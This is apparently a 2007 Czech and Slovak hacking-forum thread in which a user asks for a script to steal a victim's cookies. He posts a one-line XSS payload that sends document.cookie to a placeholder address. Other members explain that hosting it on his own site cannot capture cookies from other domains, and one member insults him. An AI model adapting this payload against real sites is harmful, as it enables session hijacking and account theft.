| ahojte potreboval by som tento script pre steal cookies, nema ho niekto ?:) (odpovědět) | ivoralik | | 440-343-636 | 25.10.2007 14:32 |
|
|
|
re: xss script hijacking | # |
| tak nasiel som ho
<script>
new Image().src="blabla"+encodeURI(document.coo kie);
</script>
len mi poradte ako ho mam upravit:( (odpovědět) | ivoralik | | 440-343-636 | 27.10.2007 18:22 |
|
|
|
re: xss script hijacking | # |
| Čemu na tom nerozumíš? Připadá mi, že spíš ani nevíš, k čemu ten script slouží. Schválně mi svými slovy vysvětli, k čemu jej chceš použít... :)
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
re: xss script hijacking | # |
| tak spis nevim,do js sa nevyznam
potrebujem ho ku steal cookies,script si hodim na stranku a obet navstivi tuto stranku a cookies jej stealnem (odpovědět) | |
|
|
re: xss script hijacking | # |
| ivoralik: OK, tak začni tím, že si přečteš něco o XSS. Při té příležitosti se dozvíš i odpověď na svou otázku. Pokud bys ten script hodil na svůj web, tak bys získal maximálně tak cookie ze svého webu, nic víc :) Ten script musíš umístit na ten server, ze kterého chceš cookies krást.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
re: xss script hijacking | # |
| moment,je cookie chcem krast priamo nejakej osobe,myslel som to tak,ze na svoju stranku si hodim script,obet pride na stranku a tak jej ukradnem cookies (odpovědět) | ivoralik | | 440-343-636 | 28.10.2007 14:17 |
|
|
|
re: xss script hijacking | # |
| to by potom ukládání citlivých informací do cookies ztrácelo smysl :-)
----------
Get enlightened! (odpovědět) | |
|
|
re: xss script hijacking | # |
| ivoralik: Tak takhle to tedy opravdu nefunguje :)
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
re: xss script hijacking | # |
| ivoralik: Vis vubec co je to cookie?? (odpovědět) | RubberDuck. | 85.71.165.* | 28.10.2007 19:56 |
|
|
|
re: xss script hijacking | # |
| ivoralik: kolikrat jsi videl Matrix? (odpovědět) | ( I ) | 85.132.198.* | 28.10.2007 20:11 |
|
|
|
re: xss script hijacking | # |
| to mi chcete povedat ze cookies sa nedaju stealnut? (odpovědět) | ivoralik | | 440-343-636 | 28.10.2007 20:42 |
|
|
|
re: xss script hijacking | # |
| daji, ale ne tvojim zvlastnim a nerealnym zpusobem (odpovědět) | ( I ) | 85.132.198.* | 28.10.2007 21:22 |
|
|
|
re: xss script hijacking | # |
| preco by neslo vyuzit chybu ie? pomocou js stealnut cookies?tak ze ten js hodim na svoju stranku ,obet ju navstivi a cookie mi ulozi do dokumentu,to sa predsa da nie? (odpovědět) | |
|
|
re: xss script hijacking | # |
| ivoralik: Ale uvedom si k cemu slouzi cookies?? Myslis ze ma kazdy pocitac vsude v internetu stejne cookies at uz jsou tady na SOOMu nebo treba na GOOGLu?? (odpovědět) | RubberDuck. | 85.71.165.* | 29.10.2007 12:15 |
|
|
|
re: xss script hijacking | # |
| ivoralik ty se radeji uz o nic nepokousej, pac s tvou demenci nemas na nic sanci. Neumis hledat v googlu, to je uz znamka toho, ze jsi idiot. Navic jsi DOTED nepochopil, ze tvuj zpusob je nefunkcni a naprosto nerealny (odpovědět) | ( I ) | 85.132.198.* | 29.10.2007 12:53 |
|
|
|
re: xss script hijacking | # |
| Zas až tak nereálné to není, pokud se budeme bavit o chybách v prohlížečích. Občas se objeví nějaký ten exploit, který umožní zapsat cookie pod cizí doménou, nebo přečíst cookie jiného serveru. To už se ale dostáváme k jinému problému, než jakým byl dotazovaný problém. Tyto chyby jsou téměř okamžitě opravovány a navíc jejich zneužití není tak jednoduché, aby stačil script, který jsi zde naznačil.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|